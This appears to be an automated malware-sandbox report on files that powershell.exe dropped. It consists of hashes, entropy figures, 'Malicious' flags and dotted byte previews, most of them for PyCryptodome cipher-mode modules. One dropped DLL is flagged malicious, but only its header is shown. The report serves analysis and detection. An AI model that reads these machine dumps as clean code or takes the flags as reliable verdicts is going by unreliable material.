                                                                                                                                                                                                                      SHA-512:7660C16835BACFC4F2A04BA8B420464DF762DE0FD4B6EB5CEE5D5139306AA2EB5007694E527BAC755A0483AA51DE14125CE00B08D9F5C9C1AA9ACC7B9FE6581E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.+........................|.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24768
                                                                                                                                                                                                                      Entropy (8bit):5.261616742852958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Fq/qgUTxXwBVkwI4IiJ3tiuwHytI89+381SWWNB+m7cfrmhgqF50F:FZwAIJ3t3t+W2Qm7uhF
                                                                                                                                                                                                                      MD5:A120FF93497C0AC6433F7B5F9C95EF57
                                                                                                                                                                                                                      SHA1:3F751D25CEB3FB514137F460E0DB6A2151C63B9E
                                                                                                                                                                                                                      SHA-256:0A52E8934F9C7FC0A0E8E91387C83CFEB14D1C9B1D684B52C284340B6CED78B8
                                                                                                                                                                                                                      SHA-512:C5A75EACA5181CEAB9B10CD21947DEC3C6D156F1FE5350972A3F17412E67CF8A2A24F821DD54D67A86929FA750397D271DFBA46F8570F20DFD220F8808C48842
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.a.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...e.d.d.d...........Z...G.d...d.e.........Z.d...Z.y.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc...........................t.........d.d.|.........S.).N..Enum..)...type)...enumss.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Cryptodome/Cipher/_mode_ccm.py..enumr....3...s..............E..".."...............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc.....................n.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.y.).r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10033
                                                                                                                                                                                                                      Entropy (8bit):5.256536352458104
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:76kvY/G8HD7rfYnxEZbYSPisjU+t834mGPMsQAaurKet834U5pI1i7O8fQaCtqph:U37rfYxEZ1PU4BpU4DheQR5S
                                                                                                                                                                                                                      MD5:3F465C99C6A70D3BB9E469DB017FE3A8
                                                                                                                                                                                                                      SHA1:996D3B817AD5BE3836552770D8A6C4AB205BA883
                                                                                                                                                                                                                      SHA-256:BD30180352862EA2A76C464F0052003F3B7F2258C443281F13B2B2EB8E23FDE3
                                                                                                                                                                                                                      SHA-512:84AFE48A3EB4A1AC03A1B7BBC151BDA76E7F5131504806A3F71805790D28C7F621F585F1306DDE64DD1F4ECBE3CE143132628F07986BCC78C86702EAEAD1AB8F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.+........................|.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbSt
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14326
                                                                                                                                                                                                                      Entropy (8bit):5.299695360323435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:fiGD3kH7TxiM16Tsy1DpGU4PGU4fEz13B3kSkIkjooWRs:fZzdSDmDpGTPGTfIpiSkI+ooWRs
                                                                                                                                                                                                                      MD5:A6B5BE4235B8F40ADF03B9BCEBA6ECF4
                                                                                                                                                                                                                      SHA1:A08571A5BA68CA1CD1ABF7B9A1E4DD1C9A21B4C4
                                                                                                                                                                                                                      SHA-256:5B8A7BD8436AC3C4DB0F2889EE32B042359DEFD6CE22ED72BC255F8AE72EA155
                                                                                                                                                                                                                      SHA-512:E3B5D5F692BF4778C72C3C40A1090D644534601AC91329B7E254F6649CAC46845BF449C8624D2B21D20C44EA3ACADE2B68FAA7B406185E625EC1312DEDFFBFCF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.eu?.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Cryptodome.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15120
                                                                                                                                                                                                                      Entropy (8bit):5.257394213248348
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:fwXaChWeM40IVjTNzOTXdtQAK7TBvA7qX5dONxuIJ:fZCgHSpkQxTJA7UOmIJ
                                                                                                                                                                                                                      MD5:A7BA7F0D78D12C9E29F9471C195C881F
                                                                                                                                                                                                                      SHA1:B784040422A1987B4F4423B235D9CCBC698485E5
                                                                                                                                                                                                                      SHA-256:179111CEAD7AECC54307DC07656C8C998C1E9D8AF3A970E12C31DB5C41F2E587
                                                                                                                                                                                                                      SHA-512:DED1760D46089578A485060B22E423461DEFFB9555435C429F06F8B2FAF7A45CDC84BCAA06CB7A1D7CFD4B4E26343F5597D23B1570A1AFDC5965E7EBC1D210EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e-:.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d...Z.y.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc.....................T.....e.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.y.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified or corrupted... This
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7462
                                                                                                                                                                                                                      Entropy (8bit):5.225802365826313
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:RQRp6kvViAtXE0hf7Dx7l7lkuiB7qBP6sQLR7D/GzGvaqc5p3hk7OEzlTZJ6l7:Rcip0hx7QrbvuzGvwhzEzLJU7
                                                                                                                                                                                                                      MD5:F1E1831EAEBAD6A20EC965F060836ADF
                                                                                                                                                                                                                      SHA1:0A54BFFAAB60F582B1650CCA7BD918B8D2C0B40E
                                                                                                                                                                                                                      SHA-256:AFEAE2A387FF7A0FF0530FD24974EDBBDC4CF45A738DD14189B5770913FBD7C6
                                                                                                                                                                                                                      SHA-512:7032528C07DAE9724D68EE625C80EF32CD9822B1EFF6BDE53C9C8F2D5E291D7368D2AD98F0337903FEB988945EB5A7F64C25E96A4F8A032EECB1CD5E18E06811
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e]!........................d.....d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Cryptodome.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c...............
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23003
                                                                                                                                                                                                                      Entropy (8bit):5.344088242792999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:5Q4hyWDBspLgqxMbfjYM4b4G11TGFT4d4dnVr2oLRehGG7fbj7A526:pNDBspLgcWVnG1l4PioteUG7zB6
                                                                                                                                                                                                                      MD5:BC0692E963EC15803B90FF6ED6CCCF2B
                                                                                                                                                                                                                      SHA1:3A74E4B8848C3EE5A4BFBEB7221ED79FE7F2D5D2
                                                                                                                                                                                                                      SHA-256:499DB50D3801D8BF8178FC2D786BD18B5B09BFB9534A0430BBEDCC8DEA79E4B8
                                                                                                                                                                                                                      SHA-512:C2ED1BF78A5A196775F4FA396AA5845037FB118B8E8E6354999FE8E68F72EBB64F59E50420179E0F3E57955C54F7FD872ED7090A800B9850418E52CDA33E98AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.U..............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...e.........Z.d...Z...e.........Z...G.d...d.e.........Z d...Z!..e!d.d...........Z"..G.d...d.e.........Z#d...Z$y.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c...........................d.d.l.m.}...d.}
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19866
                                                                                                                                                                                                                      Entropy (8bit):5.286399268733069
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FqHGsi2jDCqFA+xR48GueWtSe4ey+YEET1PYErwG9Bx4:FsGsJmqe+jwKcb1QEB9Bx4
                                                                                                                                                                                                                      MD5:736835A49A4A70C6213C3C48F3BB258A
                                                                                                                                                                                                                      SHA1:A0923CD8BC6535CD47D7A6DA89398ECD3469B988
                                                                                                                                                                                                                      SHA-256:BFB08734CC0A84094F5C204E53BADF6754DF8ADF9A8374766B519F0136EAED93
                                                                                                                                                                                                                      SHA-512:674B10C9FD62D646F92247C8C6B7565E30B5E25E631A8EE36ADD60D52B6E4ABFE95E6776A074F2545062DED7E224BB2CEF4E5ACCB9B6BCD0546928805CC8309A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.P.............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).ap....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Cryptodome.Cipher import AES. >>> from Cryptodome.Random import get_random_bytes. >>>. >
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9472
                                                                                                                                                                                                                      Entropy (8bit):5.225930754532661
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:w6kv+jQvHhtNfsnxINwsSSlVns+t834mGPMsQA+CrDkt834+5pdE7OFbEQs6tXc9:nyhtNfsxIZnDU4JeU4wTeQ97y
                                                                                                                                                                                                                      MD5:E6F37387C71D9DAC14F30681BEBB7583
                                                                                                                                                                                                                      SHA1:A79F21ABB3116B3315FDDECBAD12414072D9DB8B
                                                                                                                                                                                                                      SHA-256:8D3AA5E75C80AB5337B564F71D75E24CE944DF8D792534580E0D0FC22947D876
                                                                                                                                                                                                                      SHA-512:BB93F2C40BAE643EADBB168F23C93A4F783ED4897EB3D3901581499325358A9AB81802BCC0501BDB96A4DCD483B39396A53AEB74AB2521F4FBD53B36FC8737A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.)........................|.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6167
                                                                                                                                                                                                                      Entropy (8bit):5.3608254454868
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:J8N+B48w1IGXtXbJ/t834mGPUFt834wY9Npw1nxBXGskxVzl:Q+HURZlFU44TU479NpyxE5
                                                                                                                                                                                                                      MD5:F5E22312F12858B92FAF9B878B49E0AA
                                                                                                                                                                                                                      SHA1:FAC276D7FF7BE93BAEE847FF94F4020166E1BBE6
                                                                                                                                                                                                                      SHA-256:77BD895DB26F9F2AE47D2FE981F934B22B61FC64DF8BFA78515B637FC1EA4282
                                                                                                                                                                                                                      SHA-512:047D78B92C5E88DEAB719564F1712DD601C889D5D0EBDA99A56085047548D8211A1973229A8E92D9C7B06F4813BAC3B1A33CFBC15BAF4FF856F48F23C8E531CF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.ec.........................B.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d...Z.y.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc.....................".....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.y.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c..........................|.j...................|._.........d.|._...........|.j...................|.|.j.........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14535
                                                                                                                                                                                                                      Entropy (8bit):5.3215979142117815
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:e3qjzBGj+wQ/HWjnrEANssGdDGdkTEpZnMt3fWpM7/heH8C4aUu35xIbx0rB3:wq4W/HcnrE2sfQvMt+pM75l9aDeW13
                                                                                                                                                                                                                      MD5:D4645399ECBC30BB2F1448238F612F8E
                                                                                                                                                                                                                      SHA1:73C94892C052225CE32750D2F1F440F8B3B9B1B8
                                                                                                                                                                                                                      SHA-256:E8BA2836DF9716FA56FF12E18B8C4C33B80674B1DB653EB366B3A9FAD81B31F6
                                                                                                                                                                                                                      SHA-512:1E66DB6882170B17F0836EF2F516D17C46B5B531E12ECFF5B5AEFD516C9BEE65F5780351087434059A253B8827F00112D3321C9B544712D1623A39FE7C4F3ABB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.eA8.............................d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d...Z.y.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc.....................V.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.y.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including the. header - has been
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2117
                                                                                                                                                                                                                      Entropy (8bit):4.719000635945439
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:qqKWUsetp6ePCXjDbfghkQ3QROKJwAqAjx2x/FX8yLrEdAgLQ+74fm7wZiOI0/Hi:C9sM6pPKZKnx2x/uUtgYHT2
                                                                                                                                                                                                                      MD5:84CB68587EA688BDDDC05C72DD0EEEA1
                                                                                                                                                                                                                      SHA1:9BBF3925BB6E9970BAE0E1E750A33B431ED381C9
                                                                                                                                                                                                                      SHA-256:91F19312DF4D161E38BAC6B5BEF32EC9B3722FBB209F233DB0DE079BF612B653
                                                                                                                                                                                                                      SHA-512:6C9DFB16E79D946AED63086111A7C88A3B8E3C140A556A2D0957E698C1519B61B811C8027D110A5E2CDA40B8B5EC32E5123B4EF3708CC51617C270624EE5CC03
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.eQ.........................6.....d.d.l.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.y.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c...........................t.........|.........t.........|.........k7..r.t.........d...........t.........j...................t.........|.........t....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                      Entropy (8bit):5.061520684813544
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:cdF/1nb2mhQtkXn0t/WS60YYDEbqvdvGyv9lkVcqgYvEMo:e2f6XSZ6XYD5vdvGyv9MgYvEMo
                                                                                                                                                                                                                      MD5:E2AB7EECFD020CFDEBA6DD3ADD732EB7
                                                                                                                                                                                                                      SHA1:26975087F7AC8001830CAD4151003DBCABF82126
                                                                                                                                                                                                                      SHA-256:85BCF0FD811ADE1396E3A93EEEF6BC6B88D5555498BA09C164FAA3092DACDEFF
                                                                                                                                                                                                                      SHA-512:EB45126A07128E0FA8DC2B687F833BA95BB8703D7BC06E5C34F828EAEF062CFCA56D8A51A73B20DFA771595F6C6D830B659B5C0EB62467C61E95C97C4A73398D
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11201
                                                                                                                                                                                                                      Entropy (8bit):4.610327962054972
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IC/5xlJT9O++U4/2+2U4+B0+gvz:0rskrs9VqNzJJGTe+2T+B8
                                                                                                                                                                                                                      MD5:209DF7941CDE5D9B199BA813CF06654C
                                                                                                                                                                                                                      SHA1:034EBECB7D074076120DC34FC27BCBB507C80C71
                                                                                                                                                                                                                      SHA-256:AC4572721D16342B0F4B4B81E06F1108DC391736F68B5F723C176F414002238C
                                                                                                                                                                                                                      SHA-512:AF910413AA808464A5140935871576853E9D13DB06C14BD21212C420A4CCF367FDF73AA69231540391E76BE04425B1741A5FBD827E1F63AD2861BA06C611D55B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):716
                                                                                                                                                                                                                      Entropy (8bit):4.751012185181633
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBw1k1Jal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                                      MD5:374718D8A7601AFF8E74B7B67F517B38
                                                                                                                                                                                                                      SHA1:BF6DDE08FEABEA4908869E1790DF38DDAB69CADF
                                                                                                                                                                                                                      SHA-256:32C4737F3237691DAC8534EA506CD139E17FA709139B07A3CDF3513EBC850DCC
                                                                                                                                                                                                                      SHA-512:9966959122F804F46CD4A594AB3F6D54B103236AB15BF80D97C63B30AA02CD0E5E2E46ACC9B38B85237CA0E6147020C93A66C069401FA47087BFB29EFE3EB82B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25057
                                                                                                                                                                                                                      Entropy (8bit):4.6777979456783525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/I+Nn1nXrBamtA6/c1VaO37n2x4Cg4wCy4g3NeVRWPv8GvvBsm:0rskrs9Vqj1n71/wH2x4swgg9eXWHzv5
                                                                                                                                                                                                                      MD5:93F47C909B97F816487F5855580C6766
                                                                                                                                                                                                                      SHA1:62C1E3656C1A2376D1F806A5E9075EE752D3A0E8
                                                                                                                                                                                                                      SHA-256:58A197784FC8D0CDCA227615B004F292313F42BF41CDCEC8FA8F258811774A38
                                                                                                                                                                                                                      SHA-512:AAA3A1C061BF8BBB2035321219541E24FE7585C8357112C187C11274B3F27DED4C80D04F909B97E492711D8E74569930E970BE28814CDB0DF1C0B2A628797709
                                                                                                                                                                                                                      Malicious:false
